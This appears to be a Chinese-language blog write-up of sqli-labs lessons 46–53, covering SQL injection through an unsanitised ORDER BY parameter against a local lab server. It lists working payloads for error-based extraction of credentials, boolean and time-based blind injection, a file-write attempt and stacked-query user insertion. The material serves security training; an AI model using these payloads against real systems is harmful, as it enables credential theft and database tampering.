<!DOCTYPE html>



  


<html class="theme-next gemini use-motion" lang="en">
<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="Hexo, NexT">










<meta name="description" content="Less-46">
<meta property="og:type" content="article">
<meta property="og:title" content="less46-53">
<meta property="og:url" content="http://yoursite.com/2020/11/02/less46-50/index.html">
<meta property="og:site_name" content="Welcome to my blogs!">
<meta property="og:description" content="Less-46">
<meta property="og:locale" content="en">
<meta property="og:updated_time" content="2020-11-02T14:35:11.709Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="less46-53">
<meta name="twitter:description" content="Less-46">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Gemini',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: 'Author'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://yoursite.com/2020/11/02/less46-50/">





  <title>less46-53 | Welcome to my blogs!</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="en">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Welcome to my blogs!</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            Home
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            Archives
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2020/11/02/less46-50/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="xqhm">
      <meta itemprop="description" content>
      <meta itemprop="image" content="/images/1.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Welcome to my blogs!">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">less46-53</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2020-11-02T22:16:22+08:00">
                2020-11-02
              </time>
            

            

            
          </span>

          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h3>Less-46</h3>
<a id="more"></a>
<p>
请求方式    注入类型            拼接方式
GET    报错、布尔盲注、延时盲注    ORDER BY $id
</p>
<p>先看关键源码</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"># GET 方式获取 sort 参数</span><br><span class="line">$id=$_GET[&apos;sort&apos;];</span><br><span class="line"></span><br><span class="line"># 直接将 id 带入 SQL 中</span><br><span class="line">$sql = &quot;SELECT * FROM users ORDER BY $id&quot;;</span><br><span class="line"></span><br><span class="line">if 查询成功：</span><br><span class="line">    输出查询信息</span><br><span class="line">else：</span><br><span class="line">    print_r(mysql_error());</span><br><span class="line"></span><br></pre></td></tr></table></figure>
<p>
其实看完源码知道它的原理，就可以用注入姿势上
验证方式</p>

<h4>升序和降序验证</h4>
<p>
Bash
# 升序排序
?sort=1 asc

</p><h1 id="降序排序"><a href="#降序排序" class="headerlink" title="降序排序"></a>降序排序</h1><p>?sort=1 dasc<br>rand() 验证<br>rand(ture) 和 rand(false) 的结果是不一样的</p>
<p>Payload<br>?sort=rand(true)<br>?sort=rand(false)<br>所以利用这个可以轻易构造出一个布尔和延时类型盲注的测试 payload</p>
<p>此外 rand() 结果是一直都是随机的</p>
<p>?sort=rand()<br>?sort=1 and rand()</p>
<p></p>
<p>
</p><h4>延时验证</h4>
Payload
?sort=sleep(1)
?sort=(sleep(1))
?sort=1 and sleep(1)
这种方式均可以延时，延时的时间为 (行数*1) 秒
<p></p>

<h4>报错注入1</h4>
<p>
Payload
http://192.168.248.133/sql/Less-46/?sort=1 and updatexml(1,concat(0x7e,(select database()),0x7e),1)--+
</p>

<h4>报错注入2</h4>
<p>
利用 procedure analyse 参数，也可以执行报错注入。

</p><p>Payload<br>?sort=1 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1)<br>?sort=1 procedure analyse(extractvalue(rand(),concat(0x3a,(SELECT+CONCAT_WS(‘:’,username,password)+FROM+users limit 0,1))),1)</p>
<p></p>

<h4>布尔盲注</h4>
<p>
数据库第 1 位为：s

</p><p>Payload<br>?sort=rand(left(database(),1)&gt;’r’)<br>?sort=rand(left(database(),1)&gt;’s’)</p>
<p></p>
<h4>延时盲注</h4>
<p>
数据库第一个字母的 ascii 码为 115，即s
</p><p>
Payload
?sort=rand(if(ascii(substr(database(),1,1))>114,1,sleep(1)))
?sort=rand(if(ascii(substr(database(),1,1))>115,1,sleep(1)))

</p><p>用into outfile将查询结果导入到文件<br>?sort=1 into outfile “/var/www/html/less46.txt”<br>失败<br>国光说，web目前mysql没有读写权限造成的</p>
<p></p>
<h3>Less-47</h3>
<p>
请求方式        注入类型                拼接方式
GET        报错、布尔盲注、延时盲注        ORDER BY '$id'
和 Less-46 相比，利用方式不变，只是拼接方式方式变化，注入的时候只要正常闭合即可。
</p>
<h3>Less-48</h3>
<p>
请求方式        注入类型            拼接方式
GET        布尔盲注、延时盲注        ORDER BY $id
和 Less-46 相比少了报错注入，布尔、延时盲注依然可以正常使用，into outfile 也可以，这里国光不再过多演示了。
</p>
<h3>Less-49</h3>
<p>
请求方式        注入类型            拼接方式
GET        布尔盲注、延时盲注        ORDER BY '$id'
</p>
<p>
和 Less-47 相比少了报错注入，布尔、延时盲注依然可以正常使用，into outfile 也可以，这里国光不再过多演示了。
</p>
<h3>less-50</h3>
<p>
跟less46一样的拼接
报错注入
http://192.168.248.133/sql/Less-50/?sort=1 and updatexml(1,concat(0x7e,(database()),0x7e),1)

</p><p>因为源码中有mysqli_multi_query 函数用于执行一个 SQL 语句，或者多个使用分号分隔的 SQL 语句。<br>这个就是堆叠注入产生的原因，因为本身就支持多个 SQL 语句。</p>
<p></p>
<p>
堆叠注入
?sort=1;insert into users(username,password) values ('less50','less50');
</p>
<p>
Boolean
?sort=1 and if(left(database(),1)='s');
</p>

<h3>Less-51</h3>
<p>
请求方式        注入类型                                    拼接方式
GET                报错、布尔盲注、延时盲注、堆叠注入        ORDER BY '$id'

</p><p>?sort=1’ –+</p>
<p></p>
<h3>less-52</h3>
<p>
通过对比源码
在less-51中有print_r(mysqli_error($con1));
但是在less-52无
所以没有报错注入这东西
其它和less51一样
</p>
<h3>Less-53</h3>
<p>
请求方式        注入类型                            拼接方式
GET                布尔盲注、延时盲注、堆叠注入        ORDER BY '$id'
和 Less-51 是一样的，只是少了报错注入的利用方式。
</p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2020/10/31/记一次ssrf漏洞gopher对mysql的攻击/" rel="next" title="记一次ssrf漏洞gopher对mysql的攻击">
                <i class="fa fa-chevron-left"></i> 记一次ssrf漏洞gopher对mysql的攻击
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2020/11/02/less54-65/" rel="prev" title="less54-65">
                less54-65 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            Table of Contents
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            Overview
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image" src="/images/1.gif" alt="xqhm">
            
              <p class="site-author-name" itemprop="name">xqhm</p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">20</span>
                  <span class="site-state-item-name">posts</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                
                  <span class="site-state-item-count">2</span>
                  <span class="site-state-item-name">categories</span>
                
              </div>
            

            
              
              
              <div class="site-state-item site-state-tags">
                
                  <span class="site-state-item-count">19</span>
                  <span class="site-state-item-name">tags</span>
                
              </div>
            

          </nav>

          

          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#null"><span class="nav-number">1.</span> <span class="nav-text">Less-46</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#null"><span class="nav-number">1.1.</span> <span class="nav-text">升序和降序验证</span></a></li></ol></li></ol><li class="nav-item nav-level-1"><a class="nav-link" href="#降序排序"><span class="nav-number"></span> <span class="nav-text">降序排序</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#null"><span class="nav-number">0.1.</span> <span class="nav-text">延时验证</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#null"><span class="nav-number">0.2.</span> <span class="nav-text">报错注入1</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#null"><span class="nav-number">0.3.</span> <span class="nav-text">报错注入2</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#null"><span class="nav-number">0.4.</span> <span class="nav-text">布尔盲注</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#null"><span class="nav-number">0.5.</span> <span class="nav-text">延时盲注</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#null"><span class="nav-number">1.</span> <span class="nav-text">Less-47</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#null"><span class="nav-number">2.</span> <span class="nav-text">Less-48</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#null"><span class="nav-number">3.</span> <span class="nav-text">Less-49</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#null"><span class="nav-number">4.</span> <span class="nav-text">less-50</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#null"><span class="nav-number">5.</span> <span class="nav-text">Less-51</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#null"><span class="nav-number">6.</span> <span class="nav-text">less-52</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#null"><span class="nav-number">7.</span> <span class="nav-text">Less-53</span></a></li></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">xqhm</span>

  
</div>


  <div class="powered-by">Powered by <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a></div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">Theme &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Gemini</a> v5.1.4</div>




        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.4"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  

  

  
  

  

  

  

</body>
</html>
